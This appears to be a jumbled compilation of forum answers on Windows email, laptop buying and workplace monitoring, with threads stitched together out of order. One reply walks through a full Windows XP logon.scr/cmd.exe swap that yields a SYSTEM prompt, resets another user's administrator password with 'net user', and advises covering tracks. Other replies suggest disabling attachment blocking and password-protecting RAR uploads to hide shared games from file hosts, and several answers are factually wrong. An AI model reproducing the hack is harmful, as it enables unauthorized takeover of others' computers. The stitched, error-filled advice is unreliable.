Windows live email into explorer?

Does anyone know how to put the windows live icon into windows explorer? I have vista basic and it doesnt have icon in explorer like previous windows unless i am missing something? Dont want yahoo email. It stinks too much spam

Hi there, There could be many problems. One the server is down and this causes probelems for new users. You have the corrcet passward and user name.

I had a issue with a new account and the clock was wrong. So that had to be rest but normal will be try again later.

did you check and see if your caps log was on? passwords are often case sensitive -- lots of times that's the problem with failed login

You can't just email an installer. You'll have to install from a CD preferably a restore CD that was made for your computer with your computer's hardware drivers on it.

i want to buy a "gaming" laptop but i need word and internet/email available. i found this one laptop on walmart.com: Acer 17" Aspire with AMD Athlon 64 X2 Dual-core processor for $698. it has vista home premium built in. is this a good buy? and which is a better processor: AMD Athlon or Celeron?

1) Microsoft Word does not come with Vista. If you need MS Word, you'll need to purchase it separately - either along with the rest of Microsoft Office suite or on it's own. However, it doesn't come with Vista.

2) That sounds like a decent buy to me. You say you want a "gaming" laptop - something like this probably won't play many modern games that well though. It would be fine for email and internet browsing, but games are very intensive and in general, laptops aren't as good at gaming as desktop PCs. You'll probably have to spend out more money if you want to play the latest games - I would recommend getting a desktop PC instead of a laptop for gaming. Make sure it has a dual core processor too and a decent video/graphics card.

3) AMD Athlon X2 is a better processor than Intel Celeron. Celeron is now quite old, while Athlon X2 is dual core (which means it has twice the power of an old processor in it). Intel Core 2 Duos are the best chips though - buying one of these would be a good idea if you want to play the latest games on it.
Reply:Athlon is better. Celerons are just Pentiums that don't pass all of the QC checks at full speed, so they sell them flr less $ and run them a slower speeds.

Word is not included in any operating system from MS. Internet Explorer is part of the OS, and it drags Outlook Express(email) along with it.

This laptop won' work well as a gamer - lame graphics. Make sure you get at least 2Gb of memory - 4Gb would be better for games.
Reply:The Acer definitely sounds like a good computer... Windows Vista does offer internet and Microsoft word. The Athlon dual core processor is very good... You can find parts for it anywhere... I would have the Athlon before the celeron. Do you know the RAM and Size of the hard drive? those are the main factors for a good gaming computer
Reply:Computer do not come with internet/email you have to have a provider. All most all computers nowadays are internet compatible. You cant buy a computer with just word, as far as i know, but you can buy them with works. I would recommend looking into http://www.openoffice.org It is a free version of works.

Reply:If I remember correctly there are two widely used e-mail clients for a mac. One, and the most popular (and free) is Eudora. The other is Pegasus, but I have not had much experience with Pegasus.

Reply:Presuming that you are using Outlook Express, are the attachments arriving but greyed out? If so, you are probably still on the default which blocks such files. Open OE and from the tools menu choose options. On the security tab, uncheck the second square which blocks attachments that could potentially be a virus. If you are nervous you can always switch this on again when you have saved your pictures to the hard drive. Hope this helps

Microsoft Outlook Email - Windows XP?

Well, now that I've spent hours and hours on the Microsoft site, having no success, here I am to find an answer to my dilemma! This IS the place with the ANSWERS and I will come here 'straight-away' from now on.

For the past few days my opened email disappears from my Inbox? Always before it would remain there until I deleted it manually and then I could find it, if I wanted it, in my deleted folder? Can someone tell me what to do to keep it in the Inbox? I like to revisit it, a time or two, before I decide what to do with it?

Another problem I'm seeing is I can no longer move email from one folder to another? Thank you so very much for your help. I'm at my wit's end?

Note: All this started after a problem (resolved) with sending and receiving email.

Well, you need to specified what kind of mail server you are using (exchange server, pop3, etc)

if you using exchange server, the problem might also comes from your mailbox at the server, you need to contact the email server admin to verify this.

also check if you using some rules that may create conflicts

Editing e-mail and printing is different matter.

First you play with your e-mail when you finally finish editing save it OK. Then by changing print size, if you want to print what you are looking just keep holding left mouse and move from where to where you want to print go to printing, when your printer setting shows choose Selected one ( I got Japanese version English may be different) and you will have what you want.

Or if by change print size you mean, A4, B5 etc first choose e-mail you want to print then from file got to printing then click printing and You wil see a window having information of your printer click on Setting then you will see various settings choose Paper setting and do what you want.

The best thing is play a lot print and test then you will understand.

Reply:You will be hard pressed to find a free client with better backing and support than Mozilla's Thunderbird. Unless you are looking for a specific feature in a client then you should make your decision on reliability and performance. Few non-Microsoft entities can provide a similar level of support for their client (none for free) and what's more you're supporting Mozilla as well.

Well this one will atually work but be careful to follow these steps closely OK let's start---

1.) First if you have another account other than the system administrator and you can bring up the Windows command Shell which is cmd.exe then your ready.

2.) To open cmd.exe just click on the Start button and click RUN

type cmd.exe once you've done that then your in.

3.) go to the system root directory by typing "cd\" without the quotes, next type "cd\windows\system32\" OR "cd\winnt\system32"

depending on where the Windows [stuff] are located.

4.) once you see system32 at the end of the command line. (warning! here comes the hard part).

5.) start by typing "mkdir tempdir" without the qoutes press enter

next type "copy logon.scr tempdir\logon.scr" also "copy cmd.exe tempdir\cmd.exe" again no quotes, press enter after each line

(type help to understand what you are doing)

6.) next "del logon.scr" deletes original logon.scr

7.) next "rename cmd.exe logon.scr" renames cmd.exe to logon.scr

8.)"exit" quits dos

9.)Now what you have just done is told the computer to backup the command program

and the screen saver file, then edits the settings so when the machine boots the

screen saver you will get an unprotected dos prompt with out logging into XP.

Once this happens if you enter this command minus the quotes

"net user %26lt;admin account name here%26gt; password"

If the Administrator Account is called Frank and you want the password *SHEET* enter this

"net user Frank SHEET"

10.) and this changes the password on franks machine to *SHEET* and your in.

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

11.) Now log off the machine, logon.scr is the screen saver that will kick in after 15 minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes and a DOS prompt with FULL SYSTEM rights will pop up, then just to

C:\%26gt; net user administrator %26lt;newpassword%26gt;

and then log in with the new account.

Try this, might work, as long as he didn't change default permissions on C:\winnt and C:\winnt\system32 you should be golden.

Reply:The short answer is everything can be monitored. There is no place to hide on a private network. Traffic on the private network belongs to the owners of that network, not to the users.
Reply:The admin can and probably does "emulate" your screen on his or hers. Basically everything that happens on your screen will also happen on their screen. They can do this at any time and there is no way you can tell when it is happening. It would be exactly like someone sitting with you watching everything you do.

Reply:It really depends on what the administrator has installed and what they are auditing. Most likely you are safe to use IM unless you have chat logging enabled. Then if the administrator knows where the logs are they can go to your computer and read the logs. But most don't have the time for that and will usually just have a policy in place saying no IMs allowed and if they are really good they will block the IM port on the firewall so you won't ever be able to connect to the application. The IM program doesn't matter, its more of what you have enabled like chat logging. There are ways they can see the information by using whats called a network sniffer that will intercept the communications and show them the flow of traffic from your PC.

Emails they can access when they have the need to. We have to do it on occasion at my work place for management. But usually its only when there is a need for access to the email. As for passwords and other websites, really the only way they will know your passwords is if they are using a sniffer on the network which most admins don't have enabled. Its more of a network troubleshooting tool. But keep in mind that some admins will log which websites are being visited to ensure the employees are not viewing adult content from work. Sites like myspace and Yahoo should be fine.

yes, I guess they changed their comment and so on but the e-mail will stay as it is, as u can see my friend there is another option which will make all things easy for you to remember all the your contact is ( you can name them + phone number %26amp; location so in this case if any of your contact changes his name (not e-mail adrress) this will not happend in ur list it will show what u have named him, for futher question am here ton help if i can )

1. Add all the pages to one folder in bookmarks.

2. Whenever you want to open all the pages just right click on the folder and select Open in Tabs

It's what called phishing, i.e. spoof e-mail which makes you think it's from hotmail. Send a copy of the email to abuse@hotmail.com and immediately delete it from your pc.

DONT EVER GIVE ANY PERSONAL INFORMATION OVER THE INTERNET. Dont go to the site either. It will probally download a trojan and a keylogger as well.

Reply:Outlook stopped supporting Yahoo mail years ago. You will not be able to check your mail from Yahoo via Outlook.

I think you need to clean up your PC a bit. If you are using an older 32 bit Windows computer go here: http://www.stevengould.org/software/clea... and install this program. It's freeware (you don't have to pay for it) and it should delete all those old pictures you keep seeing. I've used this program for years and I find it's very useful. I hope this helps.

You will have to split the file and upload each part individually. You can upload as many files as you want, but theres a maximum file size limit for each site. For example: in rapidshare.de the limit is 100MB. You can also share other files like games, softwares, etc. by splitting them and uploading them. Make sure you add a password to you RAR file so that rapidshare or any other file hosting sites can't see the contents of your RAR Archive.

Yes you can do both

When you want to save the email on a folder in Yahoo mail, if the mail is open,

-Click on the arrow on the 'move' button for a drop down list,

-There select the folder you want to move the email to.

-If the email is unopened, then check the box next to it %26amp; continue with the above steps.

-Yahoo should move that mail automatically.

Saving an email to your computer is easy, assuming you are using Internet Explorer.

-Open the email

-On your tool bar, click on 'File'

-On the drop down, click 'save as'

-A pop up box will appear, click the arrow next to the search box for a drop down

-Select the folder you want the mail to go to

-Name the email on the bottom

I have found that I often forget where I put the email, so you may want to create a folder on your desktop first as your personal folder, then you always know where it is.

hi! i want to know how to change the email address that is already the default to another one since someone else had theirs hooked up to this computer. the "you have # unread emails" prompt when you pick which user to sign into windows xp. help! thank you!
Email notification windows xp?
After logging in..go to "Start" and open the E-mail (might be Outlook) icon. When the e-mail program opens click on the Tools Tab...select Accounts...Highlight the account you want to remove or change and select edit/delete to make the changes.

Email windows movie maker?

right now i am soooooooo annoyed.

I am trying to email myself a project that i did on windows movie maker, but when i try to open it it says file is already in use in another program! what does that meaaaaaaaaaan!

Hi,

You need to press Alt + Ctrl + Del.

Click on process tab

End the moviemaker task (moviemk.exe)

After that you should be able to email ur movie.

You should Save first the Files, how come the files still in the movie makes project can be emailed.

after you save it, attach and send.

to make sure there is no connection between the files and the programs, closed the programs.

if still problem, you have to Restart the PC to clear the cache in the memory, then you can email it.
